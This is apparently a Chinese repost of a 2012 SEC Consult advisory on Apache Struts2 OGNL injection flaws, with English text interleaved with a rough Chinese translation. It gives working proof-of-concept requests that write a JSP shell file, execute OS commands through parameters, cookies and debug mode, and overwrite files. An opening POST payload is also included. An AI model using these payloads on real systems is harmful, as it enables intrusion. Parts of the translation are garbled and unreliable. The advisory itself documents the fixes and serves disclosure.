struts2各种漏洞
http://localhost/index.html post:ageNo=2&words=%25E6%25B7%2598%25E5%25AE%259D%25E5%25AE%25A2&count='%2B#application%2B'&dtype 原版出自EXP,俺E文不是很好,木有用GG翻译很多错误 E文好点的同学麻烦一起完善下。此漏洞影响范围非常大,危害性极强! SEC Consult Vulnerability Lab Security Advisory < 20120104-0 > ======================================================================= title: Multiple critical vulnerabilities in Apache Struts2 标题:apache struts2 多个关键漏洞 product: Apache Struts2 产品:Apache Struts2 * OpenSymphony XWork * OpenSymphony OGNL vulnerable version: 2.3.1 and below 漏洞版本:2.3.1及其一下版本 fixed version: 2.3.1.1 已修复的版本:2.3.1.1 impact: critical 影响:关键 homepage: http://struts.apache.org/ 主页: found: 2011-11-18 发现日期 by: Johannes Dahse, Andreas Nusser 漏洞作者:Johannes Dahse, Andreas Nusser SEC Consult Vulnerability Lab SEC请教漏洞实验室 ======================================================================= Vendor description: 官方描述: ------------------- Apache Struts2 is a web framework for creating Java web applications. It is apache Struts2 是一个用于创建Java web应用的web框架。它用于 using the OpenSymphony XWork and OGNL libraries. By default, XWork's OpenSymphony XWork 库。默认XWork's ParametersInterceptor treats parameter names provided to actions as OGNL 拦截器参数对参数名需要提供给action expressions. A OGNL (Object Graph Navigation Language) expression is a limited 一个ONGL(国际化标准)是应该限制的 language similar to Java that is tokenized and parsed by the OGNL parser which 语言类似Java invokes appropiate Java methods. This allows e.g. convenient access to 调用 有效的java 方法。 这是一个允许转换通过的例子 properties that have a getter/setter method implemented. By providing a 有getter/setter方法被实现。通过提供一个 parameter like "product.id=1" the OGNL parser will call the appropiate setter 参数 就像product.id=1 OGNL分析器将会调用一个有效的setter方法 getProduct().setId(1) in the current action context. OGNL is also able to call getProduct().setId(1) 在当前的action文本域。OGNL将会尽可能的去调用 arbitrary methods, constructors and access context variables. For more details 有用的方法 构造函数 和 访问文本值。 更多的详情 please refer to http://commons.apache.org/ognl/language-guide.html. 请参照http://commons.apache.org/ognl/language-guide.html Vulnerability overview/description: 漏洞概述: ----------------------------------- To prevent attackers calling arbitrary methods within parameters the flag 为了防止攻击者调用任意方法任意参数 把标志 "xwork.MethodAccessor.denyMethodExecution" is set to "true" and the xwork.MethodAccessor.denyMethodExecution 设置为"true" 和 SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by 成员访问安全 域“允许静态的方法访问”设置为"false" default. Also, to prevent access to context variables an improved character 同时为了防止访问上下文变量和提供 whitelist for paramteter names is applied in XWork's ParametersInterceptor since 白名单 参数名 请求 XWork 的参数 Struts 2.2.1.1: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(]+"; 接收参数名:"[a-zA-Z0-9\\.\\]\\[\\(]+";(正则表达式过滤条件) Under certain circumstances these restrictions can be bypassed to execute 在某些情况下这些限制可以作为bypassed来执行 malicious Java code. 更多的Java代码 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) 远程代码执行在 Struts版本小于等于2.2.1.1 When an exception occurs while applying parameter values to properties the 当请求值转换为属性时会发生一个异常 value is evaluated as OGNL expression. For example this occurs when setting a 例如执行 string value to a property with type integer. Since the values are not 设置一个String为一个integer.值不会过滤 filtered an attacker can abuse the power of the OGNL language to execute 一个攻击能够轻易的通过OGNL 语言去执行 arbitrary Java code leading to remote command execution. This issue has been 任意的Java代码导致远程命令执行漏洞 reported () and was fixed in 报告: 已在Struts 2.2.3.1修复, Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked. 然而执行任意Java代码的能力已然被忽略了。 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) 远程代码执行在Struts版本小于等于2.3.1 The character whitelist for parameter names is not applied to Struts 参数名白名单不能被运用到Struts CookieInterceptor. When Struts is configured to handle cookie names, an Cookie拦截 当Struts 配置去处理cookie名 attacker can execute arbitrary system commands with static method access to 攻击者可以执行任意的系统命令通过一个静态的方法去访问java的函数 Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true within the request. 因此在接收的时候标志"allowStaticMethodAccess" 将会被设置为true 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) 3.)任意的写文件漏洞当Struts版本小于等于2.3.1 Accessing the flag "allowStaticMethodAccess" within parameters is prohibited 访问标志 "allowStaticMethodAccess" 参数是禁止的 since Struts 2.2.3.1. An attacker can still access public constructors with 自从Struts 2.2.3.1 攻击者任然可以通过公开的构造函数 (public) only one parameter of type String to create new Java objects and access their 只有一个字符串类型的参数去创建信的Java对象和访问其他的 setters with only one parameter of type String. This can be abused for example 设定器 只有一个参数类型为String字符串 这可以随便用于一个示例 to create and overwrite arbitrary files. To inject forbidden characters to the 去创建覆盖任意文件 注入禁止 filename an uninitialized string property can be used. 文件名未初始化的 的字符串将会被使用。 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) 远程代码执行Struts版本小于等于2.3.1(调试拦截) While not being a security vulnerability itself, please note that applications running in developer mode and using Struts DebuggingInterceptor are prone to 在开发模式下使用Struts调试拦截 remote command execution as well. While applications should never run in 远程代码执行完成。 当然 应用应该是从来都没有被运行在开发模式的 developer mode during production, developers should be aware that doing so not 开发者应该去做这些,不只是 only has performance issues (as documented) but also a critical security 性能问题而是一个关键的安全问题 impact. Proof of concept: ----------------- 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) Struts版本为2.2.1.1及其一下远程命令执行(ExceptionDelegator)异常 Given Test.java has an property "id" of type Integer or Long and appropriate 给Test.java 参数 “id” 类型为Integer 或者Long 或者适当的类型 getter and setter methods: getter 和 setter方法 long id; Given test.jsp with result name=input is configured for action "Test": 给 test.jsp 返回值 name=input 配置个action"Test": 以下为struts.xml配置的部分内容: struts.xml: <action name="Test" class="example.Test"> <result name="input">test.jsp</result> </action> The following request will trigger an exception, the value will be evaluated 接着接收时将会出发一个异常 值将会被传递给OGNL as OGNL expression and arbitrary Java code can be executed: 表达和任意的Java代码将会被执行: 测试参数: /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b' An attacker can also overwrite flags that will allow direct OS command execution: 一个攻击者能够覆盖标志然后执行操作系统命令。 测试语句: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b' If test.jsp displays the property "id" the result of the Java code evaluation 如果test.jsp 现实 参数id 返回Java代码 can be accessed: 将会被通过 以下为Struts标签: <%@ taglib prefix="s" uri="/struts-tags" %> <s:property value="id" /> 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) 远程代码执行在Struts 版本小于等于 2.3.1的 Cookie拦截 Given struts.xml is configured to handle all cookie names (independent of 给struts.xml配置cookie 名 limited cookie values): 限制cookie值: <action name="Test" class="example.Test"> <interceptor-ref name="cookie"> <param name="cookiesName">*</param> <param name="cookiesValue">1,2</param> </interceptor-ref> <result ...> </action> The following HTTP header will execute an OS command when sent to Test.action: 接下来HTTP头将会执行一个操作系统命令,当发送Test.action: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1 (此处执行了一个调用Windows下计算器的命令) 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Given Test.java has an uninitialized property "name" of type String: String name; // +getter+setter The following request will create/overwrite the file "C:/sec-consult.txt" (empty file): 空文件 /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1 The existence of the property 'x' used in these examples is of no importance. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) Struts 版本小于等于2.3.1远程代码执行: Given struts.xml is configured to run in developer mode and to use the 给struts.xml 配置为开发模式运行使用 debugging interceptor: 调试拦截: <constant name="struts.devMode" value="true" /> <action name="Test" class="example.Test"> <interceptor-ref name="debugging" /> <result ...> </action> The following request will execute arbitrary OGNL expressions leading to remote command execution: 接着接收任意的参数OGNL表达式将会导致远程的命令执行 测试参数: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc') Vulnerable / tested versions: ----------------------------- 所有的Struts2残片都将会被影响 All products using Struts2 are affected by at least one critical vulnerability listed above! 包含了所有! Proof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1 Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1, 2.2.3.1 and 2.3.1 Vendor contact timeline: ------------------------ 2011-12-14: Contacting vendor through security at struts dot apache dot org 联系官方检测 struts.apache.org 2011-12-14: Vendor reply, sending advisory draft 官方确认 2011-12-14: Vendor released Apache Struts 2.3.1 in parallel 官方发布 Apache Struts 2.3.1 2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted 漏洞在confirmed in Struts 2.3.1确定存在 联系官方 2011-12-16: Vendor reply, discussing workaround 官方回复 讨论工作 2011-12-20: Discussing release of fixed version 讨论发布修复版本 2011-12-21: Providing additional information 提供更多的附加信息 2012-01-03: Vendor informs that update is ready 官方准备更新 2012-01-03: Patch (2.3.1.1) is available 2.3.1.1可用 Solution: 解决方案: --------- Update to Struts 2.3.1.1 升级到Struts 2.3.1.1 Workaround: 解决办法: ----------- Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the 升级到Struts2.3.1然后再申请个强大的接收参数过滤器去 Parameters- and CookieInterceptor: 拦截参数和Cookie: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+"; 接收参数名:= "[a-zA-Z0-9\\.\\]\\[_']+";(正则表达式) Don't run your applications in developer mode. 不要把你的java web应用在开发模式下运行 Advisory URL: ------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria 奥地利 Tel.: +43 / 1 / 890 30 43 - 0 电话: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 传真:+43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com 邮箱:自己去sec-consult.com上找 EOF J. Dahse, A. Nusser / 2012